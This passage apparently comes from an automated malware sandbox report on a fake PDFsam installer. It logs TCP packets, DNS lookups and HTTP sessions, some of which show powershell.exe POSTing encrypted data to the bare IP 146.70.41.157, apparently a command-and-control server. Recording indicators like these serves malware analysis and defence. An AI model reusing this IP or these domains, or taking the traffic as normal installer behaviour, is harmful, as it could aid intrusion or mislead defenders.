                                                                                                    Oct 4, 2021 21:29:57.995834112 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.063946962 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.064081907 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.112252951 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.201523066 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.250669003 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.250741005 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.388006926 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.707637072 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.814498901 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.815407991 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.875210047 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.952894926 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:58.952994108 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.970699072 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:58.987317085 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:59.090538025 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:59.124584913 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:59.124710083 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:59.262129068 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:59.537951946 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:59.659332991 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:59.767409086 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:59.796978951 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:59.797076941 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:59.878113985 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:59.935868979 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.015537977 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.015618086 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:00.152826071 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.408020973 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.517729044 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:00.615649939 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:00.643884897 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.753004074 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:00.759344101 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.759440899 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:00.892426014 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:00.892570019 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:00.898443937 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.029953957 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.379547119 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.487452030 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:01.518286943 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.625237942 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.625390053 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:01.628385067 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:01.764311075 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.767255068 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:01.767594099 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:01.905239105 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:02.249147892 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:02.314810991 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:02.364272118 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:02.457025051 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:02.502131939 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:02.502342939 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:02.564794064 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:02.565619946 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:02.641132116 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:02.703973055 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:02.704164982 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:02.842343092 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.162836075 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.205497980 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:03.268831015 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:03.356282949 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.406919956 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.407099009 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:03.471142054 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:03.471915007 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:03.544801950 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.609209061 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.609277010 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:03.746587992 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:03.999563932 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.112703085 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:04.227562904 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.250396967 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.250566006 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:04.268080950 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:04.331509113 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:04.388266087 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.469002008 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.469203949 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:04.606694937 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.880990982 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:04.987998009 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.085290909 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.126821995 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.127027035 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.158740044 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.190942049 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.264944077 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.328325033 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.328392982 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.465878010 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.749222040 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.815035105 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.862673044 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:05.913774014 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:05.971318007 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:06.000428915 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.000534058 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:06.019232035 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:06.138297081 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.156522036 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.156691074 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:06.295479059 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.603471994 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.705708027 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:06.736284018 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.847234011 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:06.984812021 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:06.984893084 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:07.055438042 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:07.122215986 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:07.193099976 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:07.193200111 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:07.330776930 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:07.605823994 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:07.659003019 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:07.723180056 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:07.840841055 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:07.860620975 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:07.862958908 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:07.956737041 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.000401020 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.094501019 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.094628096 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.232300043 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.465408087 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.565257072 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.582012892 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.702217102 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.721079111 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.723037004 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.815274000 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.816289902 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:08.860424995 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.954025030 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:08.954113960 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.091720104 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:09.374495983 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:09.471653938 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.488132000 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.605701923 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:09.625473976 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:09.625582933 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.705993891 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.722656012 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.762945890 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:09.860492945 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:09.860630035 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:09.998253107 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:10.267956018 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:10.379137993 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:10.501885891 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:10.516365051 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:10.516454935 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:10.623146057 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:10.656050920 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:10.760901928 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:10.761066914 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:10.898694992 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:11.167277098 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:11.268724918 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:11.285759926 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:11.375560999 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:11.423470974 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:11.423595905 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:11.489234924 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:11.560957909 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:11.627801895 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:11.627965927 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:11.765604019 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.072438002 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.159523010 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:12.176701069 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:12.253351927 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.314186096 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.314361095 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:12.315627098 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:12.364031076 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:12.451843977 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.501842022 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.502002001 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:12.639641047 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:12.941164017 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:13.159437895 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:13.173711061 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:13.315691948 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:43.772115946 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:43.910667896 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:43.910832882 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:44.048878908 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:44.559027910 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:44.662118912 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:51.147770882 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:51.285626888 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:51.285742044 CEST4982880192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:30:51.426903009 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:51.905977964 CEST8049828146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:30:52.022099972 CEST4982880192.168.2.4146.70.41.157

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 4, 2021 21:28:03.990634918 CEST5309753192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:04.019176960 CEST53530978.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.313302994 CEST4925753192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:19.335228920 CEST53492578.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:21.842991114 CEST6238953192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:21.862771988 CEST53623898.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.268052101 CEST4991053192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:36.283751011 CEST5585453192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:36.295234919 CEST53499108.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.307460070 CEST53558548.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:54.426645041 CEST6454953192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:54.444957018 CEST53645498.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:55.515340090 CEST6315353192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:55.535314083 CEST53631538.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:55.874758959 CEST5299153192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:55.895291090 CEST53529918.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:56.120254040 CEST5370053192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:56.139396906 CEST53537008.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:57.620510101 CEST5172653192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:57.673372030 CEST53517268.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:58.690462112 CEST5679453192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:58.747354984 CEST53567948.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:59.310734987 CEST5653453192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:28:59.331485987 CEST53565348.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:28:59.955594063 CEST5662753192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:00.013900995 CEST53566278.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:00.935700893 CEST5662153192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:00.952781916 CEST53566218.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:01.208851099 CEST6311653192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:01.260104895 CEST53631168.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:01.753520012 CEST6407853192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:01.772308111 CEST53640788.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:02.220380068 CEST6480153192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:02.251367092 CEST53648018.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:03.311168909 CEST6172153192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:03.329224110 CEST53617218.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:04.414855003 CEST5125553192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:04.431010962 CEST53512558.8.8.8192.168.2.4
                                                                                                    Oct 4, 2021 21:29:05.105494976 CEST6152253192.168.2.48.8.8.8
                                                                                                    Oct 4, 2021 21:29:05.123980045 CEST53615228.8.8.8192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Oct 4, 2021 21:28:19.313302994 CEST192.168.2.48.8.8.80x44d8Standard query (0)api-updateservice.pdfsam.orgA (IP address)IN (0x0001)
                                                                                                    Oct 4, 2021 21:28:36.283751011 CEST192.168.2.48.8.8.80x50b8Standard query (0)wsgeoip.pdfsam.orgA (IP address)IN (0x0001)

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Oct 4, 2021 21:28:19.335228920 CEST8.8.8.8192.168.2.40x44d8No error (0)api-updateservice.pdfsam.org64.15.159.234A (IP address)IN (0x0001)
                                                                                                    Oct 4, 2021 21:28:36.307460070 CEST8.8.8.8192.168.2.40x50b8No error (0)wsgeoip.pdfsam.org64.15.159.234A (IP address)IN (0x0001)

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • wsgeoip.pdfsam.org
                                                                                                    • 146.70.41.157

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.44978564.15.159.234443C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    1192.168.2.449816146.70.41.15780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Oct 4, 2021 21:29:04.432180882 CEST2594OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 313
                                                                                                    Connection: Keep-Alive
                                                                                                    Oct 4, 2021 21:29:04.569555044 CEST2600OUTData Raw: 63 6b b9 c9 94 f8 b7 26 14 92 3e 7a 8c 7f 60 f0 90 13 ca 4b 83 8e 2a 59 94 ba 69 97 13 6b ad 22 2b 76 36 19 6c 4f b1 44 b1 09 7b e1 f7 92 54 f4 3d 9b 78 f2 79 81 98 d4 00 3c 86 cc 26 32 91 2d c1 be 7c 86 1d 67 5c 71 ad 8d ae e3 39 1c af 64 a2 26
                                                                                                    Data Ascii: ck&>z`K*Yik"+v6lOD{T=xy<&2-|g\q9d&_7sDQE$"gH&E`EuyQ|n^T1<%#tMq?56]a1NX"$C;{o2:]]#YK `
                                                                                                    Oct 4, 2021 21:29:05.385082960 CEST2663INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 134
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 38 f4 e1 5f 72 25 3c 28 0c 22 a3 e4 f0 a9 f9 ef 94 55 d6 25 ce ae c7 b7 33 8e 29 ff 63 6d bf a6 4e 0a e7 a7 f1 a5 54 a6 5e 43 3a 36 f9 e9 6d 78 a6 02 96 fc 50 a5 b1 a1 93 cb 7a 96 48 8c 63 a0 09 e3 d3 b2 fa 03 2f 52 31 87 dd 70 38 fb 1c 27 7c 0a 11 36 77 8a a5 cb fb 9c db 1c a3 ca 3e bd 31 e2 4c a5 33 00 62 15 75 c6 b7 a5 5f ea b0 3d fa 54 5a dc af 4c 79 d8 d4 05 c2 65 66 1b 1d 05 8d 87 17 15 69 ac
                                                                                                    Data Ascii: 8_r%<("U%3)cmNT^C:6mxPzHc/R1p8'|6w>1L3bu_=TZLyefi
                                                                                                    Oct 4, 2021 21:29:05.423033953 CEST2687OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 509
                                                                                                    Oct 4, 2021 21:29:05.560564041 CEST2690OUTData Raw: ce 68 2c 47 7a 08 67 dd d3 4d f3 ec cd 78 e5 4d 90 25 fe 2a d8 8f 82 5a c2 7e 06 cd 6e 98 16 41 3d a4 8c 72 eb 8f 7f f5 84 2f a5 1f 9c ca fd a6 68 c8 2c b4 34 bc af 3f e4 d0 83 fa 03 98 6f 3c 38 b3 af 2a ea 73 60 01 a5 09 a4 aa e9 63 bd f6 80 5e
                                                                                                    Data Ascii: h,GzgMxM%*Z~nA=r/h,4?o<8*s`c^elaMjh++U{305F#|q=AQhPB#6_>D>umce$6Nh~$\w1R`#}^r!luw
                                                                                                    Oct 4, 2021 21:29:06.167964935 CEST2696INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 332
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: e8 91 e0 be 7f 0f 46 1d d7 08 74 f9 10 e1 0a 8e 03 94 ee 43 21 54 71 b4 6d 04 da 52 d8 62 40 f7 98 98 dd 8f 7a 17 6c b7 d9 87 ce 4e d4 6e d7 ed 04 bb 6f 4d 5a 6d b8 4b 19 39 5c 80 1b ed 1d 83 7a b1 18 6f c3 be ed ba 99 18 2b dd 1e 02 c6 0b 5e 22 0f 3d 94 62 4a 98 4d 57 6d bf ab 65 b5 e4 01 20 64 ee e4 93 69 7c 5c 89 12 d2 51 77 d3 17 1e 78 95 02 c9 19 cc 23 3c a1 cc dc 3b 6f 0f ad 19 a5 10 d7 9f 53 4d ef 2e 04 1e c0 21 ef f1 7e 65 e2 9d ad 08 fb d8 fb 43 2e fc ad 92 a7 2d 15 09 fa 7e 38 9b 7c 26 c3 bf 33 bb 06 df c3 ad 0a 25 b9 a5 57 56 56 ee d1 02 5e 01 ed c0 a4 36 75 af 08 cb 72 f4 4c 96 55 7b 89 a2 78 29 c5 74 f9 a0 7b 2e 12 a8 14 b2 92 ad 85 a9 b2 6a e0 70 25 9c 36 84 f5 66 ef f0 43 f4 e3 5c 34 64 aa f6 e3 d9 a5 1f ff 44 29 d8 17 30 f8 6b 00 d6 25 04 01 c7 02 a9 08 40 ce c9 77 1f 6b be aa 7b d1 b6 af 2b 5a 2a 46 f7 22 7b 82 8e 23 ac 70 5c 39 6c a0 fc f8 e8 5a 8b 73 fc 0d c2 a1 47 66 ba 25 24 c1 bb de ee 47 3a 63 64 32 80 f1 5e 90 9d fd be e5 ce ad 99 7c 82 d2 a6 18 9b 58 03 07
                                                                                                    Data Ascii: FtC!TqmRb@zlNnoMZmK9\zo+^"=bJMWme di|\Qwx#<;oSM.!~eC.-~8|&3%WVV^6urLU{x)t{.jp%6fC\4dD)0k%@wk{+Z*F"{#p\9lZsGf%$G:cd2^|X
                                                                                                    Oct 4, 2021 21:29:06.452752113 CEST2698OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 415
